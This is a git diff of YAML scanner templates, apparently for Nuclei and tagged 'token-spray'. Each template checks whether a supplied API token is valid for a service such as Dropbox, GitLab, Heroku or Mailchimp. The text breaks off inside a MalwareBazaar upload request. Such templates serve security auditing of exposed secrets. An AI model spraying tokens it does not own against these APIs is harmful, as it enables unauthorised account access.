4b0a00483046022100800735e2524013964159af06cb5f0c2ba32282bb38f18d961f592b109b7763de022100e53dfb233bb0bb614a8553e084ca457cb3b701367c471fc0fadce3ee2a66eba8:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-deviantart.yaml b/poc/api/api-deviantart.yaml new file mode 100644 index 0000000000..b09e9acd2b --- /dev/null +++ b/poc/api/api-deviantart.yaml @@ -0,0 +1,21 @@ +id: api-deviantart + +info: + name: DeviantArt API Test + author: zzeitlin + severity: info + reference: https://www.deviantart.com/developers/authentication + tags: token-spray,deviantart + +self-contained: true +requests: + - method: POST + path: + - "https://www.deviantart.com/api/v1/oauth2/placebo" + body: "access_token={{token}}" + + matchers: + - type: word + part: body + words: + - '"status" : "success"' diff --git a/poc/api/api-dribbble-416.yaml b/poc/api/api-dribbble-416.yaml index ec36263d18..d9dd5f5a41 100644 --- a/poc/api/api-dribbble-416.yaml +++ b/poc/api/api-dribbble-416.yaml @@ -4,13 +4,17 @@ info: name: Dribbble API Test author: daffainfo severity: info + description: Dribbble is a self-promotion and social networking platform for digital designers and creatives reference: - https://developer.dribbble.com/v2/ - - https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Dribbble.md + - https://github.com/daffainfo/all-about-apikey/tree/main/dribbble + metadata: + max-request: 1 tags: token-spray,dribbble self-contained: true -requests: + +http: - method: GET path: - "https://api.dribbble.com/v2/user?access_token={{token}}" @@ -19,3 +23,5 @@ requests: - type: status status: - 200 + +# digest: 490a0046304402207ca77c15aa3f5dc5598a37cbd3e79b882bf1ac2c6144c11a17a4832dda005035022074dd2aa3ddcdbcc547cbc65d4d0dd7033d9d0198ea69032bd1dbe3f28068a2c8:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-dribbble-417.yaml b/poc/api/api-dribbble-417.yaml index d9dd5f5a41..b2f1d0bc9e 100644 --- a/poc/api/api-dribbble-417.yaml +++ b/poc/api/api-dribbble-417.yaml @@ -4,17 +4,13 @@ info: name: Dribbble API Test author: daffainfo severity: info - description: Dribbble is a self-promotion and social networking platform for digital designers and creatives reference: - https://developer.dribbble.com/v2/ - - https://github.com/daffainfo/all-about-apikey/tree/main/dribbble - metadata: - max-request: 1 + - https://github.com/daffainfo/all-about-apikey/blob/main/Art%20Design/Dribbble.md tags: token-spray,dribbble self-contained: true - -http: +requests: - method: GET path: - "https://api.dribbble.com/v2/user?access_token={{token}}" @@ -23,5 +19,3 @@ http: - type: status status: - 200 - -# digest: 490a0046304402207ca77c15aa3f5dc5598a37cbd3e79b882bf1ac2c6144c11a17a4832dda005035022074dd2aa3ddcdbcc547cbc65d4d0dd7033d9d0198ea69032bd1dbe3f28068a2c8:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-dropbox-418.yaml b/poc/api/api-dropbox-418.yaml index cc14c60421..334041718c 100644 --- a/poc/api/api-dropbox-418.yaml +++ b/poc/api/api-dropbox-418.yaml @@ -3,18 +3,22 @@ id: api-dropbox info: name: Dropbox API Test author: zzeitlin - reference: https://www.dropbox.com/developers/documentation/http/documentation severity: info + reference: + - https://www.dropbox.com/developers/documentation/http/documentation + metadata: + max-request: 1 tags: token-spray,dropbox self-contained: true -requests: + +http: - method: POST path: - "https://api.dropboxapi.com/2/users/get_current_account" + headers: Authorization: Bearer {{token}} - matchers: - type: word part: body @@ -22,3 +26,5 @@ requests: - '"account_id":' - '"email":' condition: and + +# digest: 490a0046304402204e14d6831dc3433fb1c35b72ae25def21d4bcee2ebfbdd1d429ab3602253846902206097732347c7735b2f4ff15bce68205cc74c65e8d650ecbc5599674f83d02adb:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-dropbox.yaml b/poc/api/api-dropbox.yaml deleted file mode 100644 index 29679e2b2f..0000000000 --- a/poc/api/api-dropbox.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: api-dropbox - -info: - name: Dropbox API Test - author: zzeitlin - reference: https://www.dropbox.com/developers/documentation/http/documentation - severity: info - tags: token-spray,dropbox - -requests: - - method: POST - path: - - "https://api.dropboxapi.com/2/users/get_current_account" - headers: - Authorization: Bearer {{token}} - - matchers: - - type: status - status: - - 200 diff --git a/poc/api/api-europeana-421.yaml b/poc/api/api-europeana-420.yaml similarity index 100% rename from poc/api/api-europeana-421.yaml rename to poc/api/api-europeana-420.yaml diff --git a/poc/api/api-fastly-424.yaml b/poc/api/api-fastly-424.yaml new file mode 100644 index 0000000000..c2b847e94a --- /dev/null +++ b/poc/api/api-fastly-424.yaml @@ -0,0 +1,30 @@ +id: api-fastly + +info: + name: Fastly API Test + author: Adam Crosser + severity: info + reference: + - https://developer.fastly.com/reference/api/ + metadata: + max-request: 1 + tags: token-spray,fastly + +self-contained: true + +http: + - method: GET + path: + - "https://api.fastly.com/current_user" + + headers: + Fastly-Key: "{{token}}" + matchers: + - type: word + part: body + words: + - '"created_at":' + - '"customer_id":' + condition: and + +# digest: 4b0a00483046022100d95d9c222388a6f2d756d5c8be1bd3552e8b22346abf9902ff20150e2f0e05fe02210099e7b5363c45f6b64f0ca5ed49a7b3816320f9d978d72c1003bd20637befe8f1:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-festivo-425.yaml b/poc/api/api-festivo-425.yaml deleted file mode 100644 index df1c5858ee..0000000000 --- a/poc/api/api-festivo-425.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: api-festivo - -info: - name: Festivo API Test - author: daffainfo - severity: info - description: Fastest and most advanced public holiday and observance service on the market - reference: - - https://docs.getfestivo.com/docs/products/public-holidays-api/intro/ - - https://github.com/daffainfo/all-about-apikey/tree/main/festivo-public-holidays - metadata: - max-request: 1 - tags: token-spray,festivo - -self-contained: true - -http: - - method: GET - path: - - "https://api.getfestivo.com/v2/holidays?country=US&api_key={{token}}&year=2020" - - matchers: - - type: word - part: body - words: - - '"id":' - - '"holidays":' - - '"name":' - condition: and - -# digest: 490a004630440220310ec371cb4874227f93c2d3efec48996e61a2e60b9b4e7eb7c11cacabdd07e7022015e3fc75ad7459d05cc1b5cac21f7d6ef42a93c521d0354d4165c5a3743d7bbe:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-festivo.yaml b/poc/api/api-festivo.yaml new file mode 100644 index 0000000000..3911ce2636 --- /dev/null +++ b/poc/api/api-festivo.yaml @@ -0,0 +1,26 @@ +id: api-festivo + +info: + name: Festivo API Test + author: daffainfo + severity: info + description: Fastest and most advanced public holiday and observance service on the market + reference: + - https://docs.getfestivo.com/docs/products/public-holidays-api/intro/ + - https://github.com/daffainfo/all-about-apikey/tree/main/festivo-public-holidays + tags: token-spray,festivo + +self-contained: true +requests: + - method: GET + path: + - "https://api.getfestivo.com/v2/holidays?country=US&api_key={{token}}&year=2020" + + matchers: + - type: word + part: body + words: + - '"id":' + - '"holidays":' + - '"name":' + condition: and diff --git a/poc/api/api-gitlab-431.yaml b/poc/api/api-gitlab-431.yaml index 96a5bde8a9..8372a3c8a0 100644 --- a/poc/api/api-gitlab-431.yaml +++ b/poc/api/api-gitlab-431.yaml @@ -6,19 +6,16 @@ info: severity: info reference: - https://docs.gitlab.com/ee/api/personal_access_tokens.html - metadata: - max-request: 1 tags: token-spray,gitlab self-contained: true - -http: +requests: - method: GET path: - "https://gitlab.com/api/v4/personal_access_tokens" - headers: PRIVATE-TOKEN: "{{token}}" + matchers: - type: word part: body @@ -26,5 +23,3 @@ http: - '"id":' - '"created_at":' condition: and - -# digest: 4a0a00473045022018e1d08da7b95bd30fe3380bf4314f6ea6c51c6885fe6e8c30838de488d446b8022100d1806cb0d3f05c93ba34ce2ff0796ad4bd0c2d4ea6a40962b628d43ac829abea:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-gitlab.yml b/poc/api/api-gitlab.yaml similarity index 100% rename from poc/api/api-gitlab.yml rename to poc/api/api-gitlab.yaml diff --git a/poc/api/api-google-drive-432.yaml b/poc/api/api-google-drive-432.yaml new file mode 100644 index 0000000000..f66896d7c3 --- /dev/null +++ b/poc/api/api-google-drive-432.yaml @@ -0,0 +1,28 @@ +id: api-google-drive + +info: + name: Google Drive API Test + author: geeknik + severity: info + reference: + - https://developers.google.com/drive/api/guides/about-sdk + metadata: + max-request: 1 + tags: token-spray,google,drive,intrusive + +self-contained: true + +http: + - raw: + - | + GET https://www.googleapis.com/drive/v3/files/{{randstr}}.txt/%3fkey={{token}}&supportsAllDrives=true HTTP/1.1 + Referer: {{referer}} + Content-Type:application/json + + matchers: + - type: word + part: body + words: + - 'File not found: {{randstr}}.txt.' + +# digest: 4b0a00483046022100f3d2e430755236cb5354472588b85c1caa009551fffb628d51c8321a8c900fd3022100c756303eff99e074d92d5f4b223322b94572b1515b741fee9473fa14cc0984ef:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-google-drive.yaml b/poc/api/api-google-drive.yaml deleted file mode 100644 index b274fd83c5..0000000000 --- a/poc/api/api-google-drive.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: api-google-drive - -info: - name: Google Drive API Test - author: geeknik - severity: info - reference: - - https://developers.google.com/drive/api/guides/about-sdk - tags: token-spray,google,drive - -self-contained: true -requests: - - raw: - - | - GET https://www.googleapis.com/drive/v3/files/{{randstr}}.txt/%3fkey={{token}}&supportsAllDrives=true HTTP/1.1 - Referer: {{BaseURL}} - Content-Type:application/json - - matchers: - - type: word - part: body - words: - - 'File not found: {{randstr}}.txt.' diff --git a/poc/api/api-harvardart-433.yaml b/poc/api/api-harvardart-433.yaml index e9f965433e..27bc5bd503 100644 --- a/poc/api/api-harvardart-433.yaml +++ b/poc/api/api-harvardart-433.yaml @@ -4,13 +4,17 @@ info: name: Harvard Art Museums API Test author: daffainfo severity: info + description: Harvard Art reference: - https://github.com/harvardartmuseums/api-docs - - https://github.com/daffainfo/all-about-apikey/blob/main/Art%20Design/Harvard%20Art%20Museums.md + - https://github.com/daffainfo/all-about-apikey/tree/main/harvard-art-museums + metadata: + max-request: 1 tags: token-spray,harvardart self-contained: true -requests: + +http: - method: GET path: - "https://api.harvardartmuseums.org/color/34838442?apikey={{token}}" @@ -23,3 +27,5 @@ requests: - '"name"' - '"hex"' condition: and + +# digest: 4a0a00473045022100ea25f9009ae369330451c63b3c843f1f258edf7a7ea2e0ecfe52697cbd3c0fc30220380e78989fb7cd4228bc4c6f334cede8846a2d2f2bbf972c5c53874a31839e9f:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-harvardart-434.yaml b/poc/api/api-harvardart-434.yaml new file mode 100644 index 0000000000..e9f965433e --- /dev/null +++ b/poc/api/api-harvardart-434.yaml @@ -0,0 +1,25 @@ +id: api-harvardart + +info: + name: Harvard Art Museums API Test + author: daffainfo + severity: info + reference: + - https://github.com/harvardartmuseums/api-docs + - https://github.com/daffainfo/all-about-apikey/blob/main/Art%20Design/Harvard%20Art%20Museums.md + tags: token-spray,harvardart + +self-contained: true +requests: + - method: GET + path: + - "https://api.harvardartmuseums.org/color/34838442?apikey={{token}}" + + matchers: + - type: word + part: body + words: + - '"colorid"' + - '"name"' + - '"hex"' + condition: and diff --git a/poc/api/api-heroku-435.yaml b/poc/api/api-heroku-435.yaml deleted file mode 100644 index 9f08e416d5..0000000000 --- a/poc/api/api-heroku-435.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: api-heroku - -info: - name: Heroku API Test - author: zzeitlin - reference: https://devcenter.heroku.com/articles/platform-api-quickstart#calling-the-api - severity: info - tags: token-spray,heroku - -requests: - - method: POST - path: - - "https://api.heroku.com/apps" - headers: - Accept: application/vnd.heroku+json; version=3 - Authorization: Bearer {{token}} - - matchers: - - type: status - status: - - 200 - - 201 - - 202 - - 206 - condition: or diff --git a/poc/api/api-heroku.yaml b/poc/api/api-heroku.yaml new file mode 100644 index 0000000000..ef9b58c7ae --- /dev/null +++ b/poc/api/api-heroku.yaml @@ -0,0 +1,25 @@ +id: api-heroku + +info: + name: Heroku API Test + author: zzeitlin + reference: https://devcenter.heroku.com/articles/platform-api-quickstart#calling-the-api + severity: info + tags: token-spray,heroku + +self-contained: true +requests: + - method: POST + path: + - "https://api.heroku.com/apps" + headers: + Accept: application/vnd.heroku+json; version=3 + Authorization: Bearer {{token}} + + matchers: + - type: word + part: body + words: + - '"created_at":' + - '"git_url":' + condition: and \ No newline at end of file diff --git a/poc/api/api-hubspot-437.yaml b/poc/api/api-hubspot-437.yaml index c646cf8861..86566864f0 100644 --- a/poc/api/api-hubspot-437.yaml +++ b/poc/api/api-hubspot-437.yaml @@ -3,35 +3,19 @@ id: api-hubspot info: name: HubSpot API Test author: zzeitlin + reference: https://legacydocs.hubspot.com/docs/methods/owners/get_owners severity: info - reference: - - https://legacydocs.hubspot.com/docs/methods/owners/get_owners - metadata: - max-request: 2 tags: token-spray,hubspot -self-contained: true - -http: +requests: - method: GET path: - "https://api.hubapi.com/owners/v2/owners?hapikey={{token}}" - - "https://api.hubapi.com/contacts/v1/lists/static?count=3&hapikey={{token}}" + - "https://api.hubapi.com/contacts/v1/lists/all/contacts/all?hapikey={{token}}" - matchers-condition: or matchers: - type: word part: body words: - - '"portalId":' - - '"ownerId":' - condition: and - - - type: word - part: body - words: - - '"metaData":' - - '"portalId":' - condition: and - -# digest: 490a0046304402202d9d252f0d8b0085a26265fbc5fa552f807d095394b41127971494d3382c2b6b022061acc2a5a6142ef4ee85fc60d8c3b097a1a6f9ed82bbbaf31b2da23da50b313f:922c64590222798bb761d5b6d8e72950 + - 'error' + negative: true diff --git a/poc/api/api-iconfinder-439.yaml b/poc/api/api-iconfinder-438.yaml similarity index 100% rename from poc/api/api-iconfinder-439.yaml rename to poc/api/api-iconfinder-438.yaml diff --git a/poc/api/api-iconfinder.yaml b/poc/api/api-iconfinder.yaml deleted file mode 100644 index 31069943c2..0000000000 --- a/poc/api/api-iconfinder.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: api-iconfinder - -info: - name: IconFinder API Test - author: daffainfo - severity: info - reference: - - https://developer.iconfinder.com/reference/overview-1 - - https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/IconFinder.md - tags: token-spray,iconfinder - -self-contained: true -requests: - - raw: - - | - GET https://api.iconfinder.com/v4/icons/search?query=arrow&count=10 HTTP/1.1 - Host: api.iconfinder.com - Accept: application/json - Authorization: Bearer {{token}} - - matchers: - - type: word - part: body - words: - - '"icons":' - - '"is_icon_glyph":' - - '"download_url":' - condition: and diff --git a/poc/api/api-improvmx-440.yaml b/poc/api/api-improvmx-440.yaml deleted file mode 100644 index a8aa0d0bdd..0000000000 --- a/poc/api/api-improvmx-440.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: api-improvmx - -info: - name: ImprovMX API Test - author: daffainfo - severity: info - description: API for free email forwarding service - reference: - - https://improvmx.com/api - - https://github.com/daffainfo/all-about-apikey/tree/main/improvmx - metadata: - max-request: 1 - tags: token-spray,improvmx - -self-contained: true - -http: - - raw: - - | - GET https://api.improvmx.com/v3/account HTTP/1.1 - Authorization: Basic {{base64(':' + token)}} - Host: api.improvmx.com - - host-redirects: true - max-redirects: 1 - matchers: - - type: word - part: body - words: - - '"billing_email":' - - '"cancels_on":' - - '"company_details":' - condition: and - -# digest: 4a0a00473045022100db35cda579311d7b993f8e4fb034c403ba8a5a5ea00221d77f6650a00814fa4902207fbfec013eb2a1c5bf89081ba3c5aa547ebe8b8a6db4f329cd99701c70307b32:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-improvmx.yaml b/poc/api/api-improvmx.yaml new file mode 100644 index 0000000000..fb6c00f0d9 --- /dev/null +++ b/poc/api/api-improvmx.yaml @@ -0,0 +1,30 @@ +id: api-improvmx + +info: + name: ImprovMX API Test + author: daffainfo + severity: info + description: API for free email forwarding service + reference: + - https://improvmx.com/api + - https://github.com/daffainfo/all-about-apikey/tree/main/improvmx + tags: token-spray,improvmx + +self-contained: true +requests: + - raw: + - | + GET https://api.improvmx.com/v3/account HTTP/1.1 + Authorization: Basic {{base64(':' + token)}} + Host: api.improvmx.com + + redirects: true + max-redirects: 1 + matchers: + - type: word + part: body + words: + - '"billing_email":' + - '"cancels_on":' + - '"company_details":' + condition: and diff --git a/poc/api/api-instatus-442.yaml b/poc/api/api-instatus-442.yaml deleted file mode 100644 index dfd968d1b3..0000000000 --- a/poc/api/api-instatus-442.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: api-instatus - -info: - name: Instatus API Test - author: daffainfo - severity: info - description: Post to and update maintenance and incidents on your status page through an HTTP REST API - reference: - - https://instatus.com/help/api - - https://github.com/daffainfo/all-about-apikey/tree/main/instatus - metadata: - max-request: 1 - tags: token-spray,instatus - -self-contained: true - -http: - - method: GET - path: - - "https://api.instatus.com/v1/pages" - - headers: - Authorization: Bearer {{token}} - matchers: - - type: word - part: body - words: - - '"id":' - - '"subdomain":' - - '"name":' - - '"logoUrl":' - condition: and - -# digest: 4a0a00473045022100850e53c92a054ffcf08500f345965b5674f65e8974a2d82117d4c127f613fcff02207fa1e6c159c8c013d78f0137271ff8bcba2204413bd77bb35fa6a1d25dc7c4d0:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-instatus.yaml b/poc/api/api-instatus.yaml new file mode 100644 index 0000000000..1175f1b8b3 --- /dev/null +++ b/poc/api/api-instatus.yaml @@ -0,0 +1,29 @@ +id: api-instatus + +info: + name: Instatus API Test + author: daffainfo + severity: info + description: Post to and update maintenance and incidents on your status page through an HTTP REST API + reference: + - https://instatus.com/help/api + - https://github.com/daffainfo/all-about-apikey/tree/main/instatus + tags: token-spray,instatus + +self-contained: true +requests: + - method: GET + path: + - "https://api.instatus.com/v1/pages" + headers: + Authorization: Bearer {{token}} + + matchers: + - type: word + part: body + words: + - '"id":' + - '"subdomain":' + - '"name":' + - '"logoUrl":' + condition: and diff --git a/poc/api/api-intercom-443.yaml b/poc/api/api-intercom-443.yaml deleted file mode 100644 index 4ae7ce807b..0000000000 --- a/poc/api/api-intercom-443.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: api-intercom - -info: - name: Intercom API Test - author: dwisiswant0 - severity: info - reference: - - https://developers.intercom.com/building-apps/docs/rest-api-reference - metadata: - max-request: 1 - tags: token-spray,intercom - -self-contained: true - -http: - - method: GET - path: - - "https://api.intercom.io/users" - - headers: - Authorization: Bearer {{token}} - Accept: application/json - matchers: - - type: word - part: body - words: - - "Access Token Invalid" - negative: true - -# digest: 4b0a00483046022100961f1591bb9414b8304809c1253739861d2e47d3555bf7caaf47cb719aec2ad602210082a496a018342802274a471a3bfd500c4e82ac6eefe13a1efc643e102609fcbc:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-intercom.yaml b/poc/api/api-intercom.yaml new file mode 100644 index 0000000000..5c0dc15191 --- /dev/null +++ b/poc/api/api-intercom.yaml @@ -0,0 +1,24 @@ +id: api-intercom + +info: + name: Intercom API Test + author: dwisiswant0 + reference: https://developers.intercom.com/building-apps/docs/rest-api-reference + severity: info + tags: token-spray,intercom + +self-contained: true +requests: + - method: GET + path: + - "https://api.intercom.io/users" + headers: + Authorization: Bearer {{token}} + Accept: application/json + + matchers: + - type: word + part: body + words: + - "Access Token Invalid" + negative: true diff --git a/poc/api/api-ipstack-444.yaml b/poc/api/api-ipstack-444.yaml index f64daea02e..8f560a1b34 100644 --- a/poc/api/api-ipstack-444.yaml +++ b/poc/api/api-ipstack-444.yaml @@ -3,10 +3,11 @@ id: api-ipstack info: name: IPStack API Test author: zzeitlin - reference: https://ipstack.com/documentation severity: info + reference: https://ipstack.com/documentation tags: token-spray,ipstack +self-contained: true requests: - method: GET path: @@ -15,6 +16,8 @@ requests: matchers: - type: word part: body - negative: true words: - - 'invalid_access_key' + - '"ip":' + - '"hostname":' + - '"type":' + condition: and diff --git a/poc/api/api-ipstack.yaml b/poc/api/api-ipstack.yaml new file mode 100644 index 0000000000..f64daea02e --- /dev/null +++ b/poc/api/api-ipstack.yaml @@ -0,0 +1,20 @@ +id: api-ipstack + +info: + name: IPStack API Test + author: zzeitlin + reference: https://ipstack.com/documentation + severity: info + tags: token-spray,ipstack + +requests: + - method: GET + path: + - "https://api.ipstack.com/8.8.8.8?access_key={{token}}" + + matchers: + - type: word + part: body + negative: true + words: + - 'invalid_access_key' diff --git a/poc/api/api-iterable-445.yaml b/poc/api/api-iterable-445.yaml index f9d0944bc8..0c1f84d566 100644 --- a/poc/api/api-iterable-445.yaml +++ b/poc/api/api-iterable-445.yaml @@ -3,28 +3,21 @@ id: api-iterable info: name: Iterable API Test author: zzeitlin + reference: https://api.iterable.com/api/docs severity: info - reference: - - https://api.iterable.com/api/docs - metadata: - max-request: 1 tags: token-spray,iterable -self-contained: true - -http: +requests: - method: GET path: - - "https://api.iterable.com/api/catalogs" - + - "https://api.iterable.com/api/export/data.json?dataTypeName=emailSend&range=Today&onlyFields=List.empty" headers: Api_Key: "{{token}}" + matchers: - type: word part: body + negative: true words: - - '"name":' - - '"catalogNames":' - condition: and - -# digest: 490a0046304402204b1b9bb40368da9ffe6528095b7316d4adbe9408501d84cd0d786d7d108e825302203bb6fdc01531a41e404e762f6e31b574c2d0a87b8a618aadb2d2fcbd525dfcbc:922c64590222798bb761d5b6d8e72950 + - 'BadApiKey' + - 'RateLimitExceeded' # Matchers needs to be replaced with valid +ve match instead of -ve diff --git a/poc/api/api-jumpcloud-446.yaml b/poc/api/api-jumpcloud-446.yaml deleted file mode 100644 index a4ee64c013..0000000000 --- a/poc/api/api-jumpcloud-446.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: api-jumpcloud - -info: - name: JumpCloud API Test - author: zzeitlin - severity: info - reference: - - https://docs.jumpcloud.com/1.0/authentication-and-authorization/api-key - metadata: - max-request: 1 - tags: token-spray,jumpcloud - -self-contained: true - -http: - - method: GET - path: - - "https://console.jumpcloud.com/api/systems" - - headers: - X-Api-Key: "{{token}}" - matchers: - - type: word - part: body - words: - - '"_id":' - - '"agentServer":' - condition: and - -# digest: 4a0a00473045022100e395470a83648eb14625518d6cc511e00a46ee8a2b83858ccdd9793fda5cab5d02200d2b5dd6e14ae4018b021a4065896b508a5b3953de86090e7c4e53a82e6b460b:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-jumpcloud.yaml b/poc/api/api-jumpcloud.yaml new file mode 100644 index 0000000000..6b9dc68d93 --- /dev/null +++ b/poc/api/api-jumpcloud.yaml @@ -0,0 +1,24 @@ +id: api-jumpcloud + +info: + name: JumpCloud API Test + author: zzeitlin + severity: info + reference: https://docs.jumpcloud.com/1.0/authentication-and-authorization/api-key + tags: token-spray,jumpcloud + +self-contained: true +requests: + - method: GET + path: + - "https://console.jumpcloud.com/api/systems" + headers: + X-Api-Key: "{{token}}" + + matchers: + - type: word + part: body + words: + - '"_id":' + - '"agentServer":' + condition: and diff --git a/poc/api/api-launchdarkly-449.yaml b/poc/api/api-launchdarkly-449.yaml new file mode 100644 index 0000000000..5490750be5 --- /dev/null +++ b/poc/api/api-launchdarkly-449.yaml @@ -0,0 +1,34 @@ +id: api-launchdarkly + +info: + name: LaunchDarkly REST API + author: Luqmaan Hadia + severity: info + reference: + - https://apidocs.launchdarkly.com/ + metadata: + max-request: 1 + tags: token-spray,launchdarkly + +self-contained: true + +http: + - raw: + - | + GET https://app.launchdarkly.com/api/v2/members HTTP/1.1 + Host: app.launchdarkly.com + Authorization: {{token}} + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - '"totalCount":' + - '"items":' + condition: and + +# digest: 4a0a00473045022059ba18b8d17fc3603d02f111b48fdc488776904846a5a670916ef5910158d0f30221008808cf1122a8d79312a459b7a53df6bb553bb4c9419cc2d5dea3ae9ef558b51e:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-launchdarkly.yaml b/poc/api/api-launchdarkly.yaml deleted file mode 100644 index 636ca9f02f..0000000000 --- a/poc/api/api-launchdarkly.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: api-launchdarkly - -info: - name: LaunchDarkly REST API - author: Luqmaan Hadia - severity: info - reference: https://apidocs.launchdarkly.com/ - tags: token-spray,launchdarkly - -self-contained: true -requests: - - raw: - - | - GET https://app.launchdarkly.com/api/v2/members HTTP/1.1 - Host: app.launchdarkly.com - Authorization: {{token}} - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - '"totalCount":' - - '"items":' - condition: and diff --git a/poc/api/api-linkfinder.yaml b/poc/api/api-linkfinder.yaml index 38c579ea74..719a8c37dc 100644 --- a/poc/api/api-linkfinder.yaml +++ b/poc/api/api-linkfinder.yaml @@ -19,4 +19,4 @@ requests: - type: regex name: relative_links regex: - - ([a-zA-Z0-9_\-/]{1,}/[a-zA-Z0-9_\-/]{1,}(?:[a-zA-Z]{1,4}|action)(?:[\?|#][^"|']{0,}|)) + - ([a-zA-Z0-9_\-/]{1,}/[a-zA-Z0-9_\-/]{1,}(?:[a-zA-Z]{1,4}|action)(?:[\?|#][^"|']{0,}|)) \ No newline at end of file diff --git a/poc/api/api-lokalise.yaml b/poc/api/api-lokalise.yaml new file mode 100644 index 0000000000..0c937b51fa --- /dev/null +++ b/poc/api/api-lokalise.yaml @@ -0,0 +1,20 @@ +id: api-lokalise + +info: + name: Lokalise API Test + author: zzeitlin + reference: https://app.lokalise.com/api2docs/curl/#resource-projects + severity: info + tags: token-spray,lokalise + +requests: + - method: GET + path: + - "https://api.lokalise.com/api2/projects/" + headers: + X-Api-Token: "{{token}}" + + matchers: + - type: status + status: + - 200 diff --git a/poc/api/api-loqate.yaml b/poc/api/api-loqate-453.yaml similarity index 100% rename from poc/api/api-loqate.yaml rename to poc/api/api-loqate-453.yaml diff --git a/poc/api/api-mailchimp.yaml b/poc/api/api-mailchimp.yaml new file mode 100644 index 0000000000..9d7073e46c --- /dev/null +++ b/poc/api/api-mailchimp.yaml @@ -0,0 +1,20 @@ +id: api-mailchimp + +info: + name: Mailchimp API Test + author: zzeitlin + reference: https://mailchimp.com/developer/transactional/docs/smtp-integration/#credentials-and-configuration + severity: info + tags: token-spray,mailchimp + +network: + - inputs: + - data: "AUTH PLAIN {{base64(hex_decode('00')+'apikey'+hex_decode('00')+token)}}\r\n" + read: 1024 + host: + - "tls://smtp.mandrillapp.com:465" + + matchers: + - type: word + words: + - "success" diff --git a/poc/api/api-mailgun.yaml b/poc/api/api-mailgun.yaml new file mode 100644 index 0000000000..3667ba1c69 --- /dev/null +++ b/poc/api/api-mailgun.yaml @@ -0,0 +1,20 @@ +id: api-mailgun + +info: + name: Mailgun API Test + author: zzeitlin + reference: https://documentation.mailgun.com/en/latest/api-intro.html + severity: info + tags: token-spray,mailgun + +requests: + - method: GET + path: + - "https://api.mailgun.net/v3/domains" + headers: + Authorization: Basic {{base64('api:' + token)}} + + matchers: + - type: status + status: + - 200 diff --git a/poc/api/api-malshare-456.yaml b/poc/api/api-malshare-456.yaml index d486f6f0fd..b1108b4e33 100644 --- a/poc/api/api-malshare-456.yaml +++ b/poc/api/api-malshare-456.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://malshare.com/doc.php - - https://github.com/daffainfo/all-about-apikey/blob/main/Anti%20Malware/MalShare.md + - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/MalShare.md tags: token-spray,malshare self-contained: true diff --git a/poc/api/api-malshare-457.yaml b/poc/api/api-malshare-457.yaml new file mode 100644 index 0000000000..69f9e105b3 --- /dev/null +++ b/poc/api/api-malshare-457.yaml @@ -0,0 +1,30 @@ +id: api-malshare + +info: + name: MalShare API Test + author: daffainfo + severity: info + description: Malware Archive / file sourcing + reference: + - https://malshare.com/doc.php + - https://github.com/daffainfo/all-about-apikey/tree/main/malshare + metadata: + max-request: 1 + tags: token-spray,malshare + +self-contained: true + +http: + - method: GET + path: + - "https://api.malshare.com/api.php?api_key={{token}}&action=getlist" + + matchers: + - type: word + part: body + words: + - '"md5":' + - '"sha1":' + condition: and + +# digest: 490a0046304402201f0d28dc875a5526f01fcabdb2e73a860ecff61d46cd931f8ec3a2652a45f7dc022033d354822af70d6a3fd65f68e1eb820b413743b263a7d0dfbac4a62a28e23c42:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-malwarebazaar-458.yaml b/poc/api/api-malwarebazaar-458.yaml new file mode 100644 index 0000000000..4a424faa68 --- /dev/null +++ b/poc/api/api-malwarebazaar-458.yaml @@ -0,0 +1,46 @@ +id: api-malwarebazaar + +info: + name: MalwareBazaar API Test + author: daffainfo + severity: info + description: Collect and share malware samples + reference: + - https://bazaar.abuse.ch/api/ + - https://github.com/daffainfo/all-about-apikey/tree/main/malwarebazaar + metadata: + max-request: 1 + tags: token-spray,malwarebazaar,intrusive + +self-contained: true + +http: + - raw: + - | + POST https://mb-api.abuse.ch/api/v1 HTTP/1.1 + Host: mb-api.abuse.ch + API-KEY: {{token}} + Content-Length: 0 + Content-Type: multipart/form-data; boundary=545d0ca717a743c3bd4fa575585f74c6 + + --545d0ca717a743c3bd4fa575585f74c6 + Content-Disposition: form-data; name="json_data" + Content-Type: application/json + + {"tags": ["exe", "test"], "references": {"twitter": ["https://twitter.com/abuse_ch/status/1224269018506330112"], "malpedia": ["https://malpedia.caad.fkie.fraunhofer.de/details/win.gozi"], "joe_sandbox": ["https://www.joesecurity.org/reports/1", "https://www.joesecurity.org/reports/2"], "links": ["https://urlhaus.abuse.ch/url/306613/"], "any_run": ["https://app.any.run/tasks/1", "https://app.any.run/tasks/2"]}, "context": {"comment": "this malware sample is very nasty!", "dropped_by_md5": ["68b329da9893e34099c7d8ad5cb9c940"], "dropped_by_malware": ["Gozi"], "dropped_by_sha256": ["01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b", 